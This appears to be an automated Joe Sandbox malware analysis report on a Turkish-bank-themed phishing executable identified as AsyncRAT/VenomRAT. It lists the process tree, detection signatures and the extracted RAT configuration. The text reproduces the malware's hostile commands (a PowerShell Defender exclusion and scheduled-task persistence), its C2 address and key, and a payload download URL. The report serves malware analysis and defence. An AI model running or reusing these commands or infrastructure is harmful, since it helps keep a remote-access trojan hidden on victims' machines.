Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ziraat Bankasi Swift Mesaji.dqy.dll

Overview

General Information

Sample name:Ziraat Bankasi Swift Mesaji.dqy.dll
(renamed file extension from exe to dll)
Original sample name:Ziraat Bankasi Swift Mesaji.dqy.exe
Analysis ID:1572391
MD5:d8debe62cb0e2fee8f1d740ba963cc71
SHA1:c1e39bee02a0a141d852921ccd2f0054b8458c58
SHA256:f95616ad77ada13b28ccb8cb4627c8f9af26c0bf46470da06e5c109a58ee8492
Tags:dqyexegeoTURZiraatBankuser-abuse_ch
Infos:

Detection

AsyncRAT, VenomRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected VenomRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 5948 cmdline: loaddll64.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7004 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5776 cmdline: rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • regasms.exe (PID: 6696 cmdline: C:\Users\user\AppData\Roaming\regasms.exe MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
          • powershell.exe (PID: 7292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7320 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • regasms.exe (PID: 7464 cmdline: "C:\Users\user\AppData\Roaming\regasms.exe" MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
            • cmd.exe (PID: 6960 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 4016 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)
            • cmd.exe (PID: 5772 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • timeout.exe (PID: 1252 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
              • NotepadUpdate.exe (PID: 1272 cmdline: "C:\Users\user\AppData\Roaming\NotepadUpdate.exe" MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
    • rundll32.exe (PID: 4692 cmdline: rundll32.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll,xlAutoOpen MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1476 cmdline: rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",xlAutoOpen MD5: EF3179D498793BF4234F708D3BE28633)
      • regasms.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\regasms.exe MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
        • powershell.exe (PID: 7640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7824 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 7664 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp2042.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • regasms.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Roaming\regasms.exe" MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
          • cmd.exe (PID: 1748 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 7324 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)
  • AtkzppDHiyvcIR.exe (PID: 7628 cmdline: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
    • schtasks.exe (PID: 8148 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp9EF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AtkzppDHiyvcIR.exe (PID: 6880 cmdline: "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe" MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
    • AtkzppDHiyvcIR.exe (PID: 6968 cmdline: "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe" MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
  • NotepadUpdate.exe (PID: 4308 cmdline: C:\Users\user\AppData\Roaming\NotepadUpdate.exe MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: VenomRAT

{"Server": "185.208.158.187", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "NotepadUpdate.exe", "AES_key": "Ijk68MD56nk4n4T5u0ZGNHKlucnIy5B2", "Mutex": "tnybaidkzovl", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "A4QJGpJy/V4cCbTnbG8X0PYHWV+LKegq58mj1q2ZoZfA9x2FqmL8bhLOPQGSBEmtgnKkbETqeRPrsSNvJO3utAVaR5kG3pnQrTTE4Lpy9we7minikcrB8f5ahxH3VCeDhOHw6yDiQnmF1keRGK6R8QzedMamHwNFpeTFBVGJSwg=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "10", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}

Threatname: AsyncRAT

{"Server": "185.208.158.187", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "NotepadUpdate.exe", "AES_key": "Ijk68MD56nk4n4T5u0ZGNHKlucnIy5B2", "Mutex": "tnybaidkzovl", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "A4QJGpJy/V4cCbTnbG8X0PYHWV+LKegq58mj1q2ZoZfA9x2FqmL8bhLOPQGSBEmtgnKkbETqeRPrsSNvJO3utAVaR5kG3pnQrTTE4Lpy9we7minikcrB8f5ahxH3VCeDhOHw6yDiQnmF1keRGK6R8QzedMamHwNFpeTFBVGJSwg=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "10", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          Process Memory Space: regasms.exe PID: 6696JoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            15.2.regasms.exe.3230128.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              15.2.regasms.exe.3230128.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
              • 0xda86:$q1: Select * from Win32_CacheMemory
              • 0xdac6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
              • 0xdb14:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
              • 0xdb62:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
              13.2.regasms.exe.28be350.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                13.2.regasms.exe.28be350.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                • 0xda86:$q1: Select * from Win32_CacheMemory
                • 0xdac6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                • 0xdb14:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                • 0xdb62:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
                13.2.regasms.exe.28d0c2c.1.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  Click to see the 21 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\regasms.exe", ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 7464, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit, ProcessId: 6960, ProcessName: cmd.exe
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\regasms.exe", ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 7464, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit, ProcessId: 6960, ProcessName: cmd.exe
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\regasms.exe, ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 6696, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", ProcessId: 7292, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\regasms.exe, ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 6696, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", ProcessId: 7292, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\regasms.exe, ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 6696, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", ProcessId: 7320, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\regasms.exe, ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 6696, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", ProcessId: 7320, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\regasms.exe, ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 6696, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", ProcessId: 7292, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\regasms.exe, ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 6696, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", ProcessId: 7320, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T14:21:40.286613+010020283713Unknown Traffic192.168.2.749700163.44.198.57443TCP
                  2024-12-10T14:21:41.350116+010020283713Unknown Traffic192.168.2.749701163.44.198.57443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T14:22:06.671516+010020522671Domain Observed Used for C2 Detected185.208.158.1874449192.168.2.749756TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T14:22:06.671516+010028424781Malware Command and Control Activity Detected185.208.158.1874449192.168.2.749756TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://52575815-38-20200406120634.webstarterz.com/EpWHRWboolCJUXe.exeAvira URL Cloud: Label: malware
                  Source: https://52575815-38-20200406120634.webstarterz.com:443/EpWHRWboolCJUXe.exeAvira URL Cloud: Label: malware
                  Source: https://52575815-38-20200406120634.webstarterz.com/Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VenomRAT {"Server": "185.208.158.187", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "NotepadUpdate.exe", "AES_key": "Ijk68MD56nk4n4T5u0ZGNHKlucnIy5B2", "Mutex": "tnybaidkzovl", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "A4QJGpJy/V4cCbTnbG8X0PYHWV+LKegq58mj1q2ZoZfA9x2FqmL8bhLOPQGSBEmtgnKkbETqeRPrsSNvJO3utAVaR5kG3pnQrTTE4Lpy9we7minikcrB8f5ahxH3VCeDhOHw6yDiQnmF1keRGK6R8QzedMamHwNFpeTFBVGJSwg=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "10", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
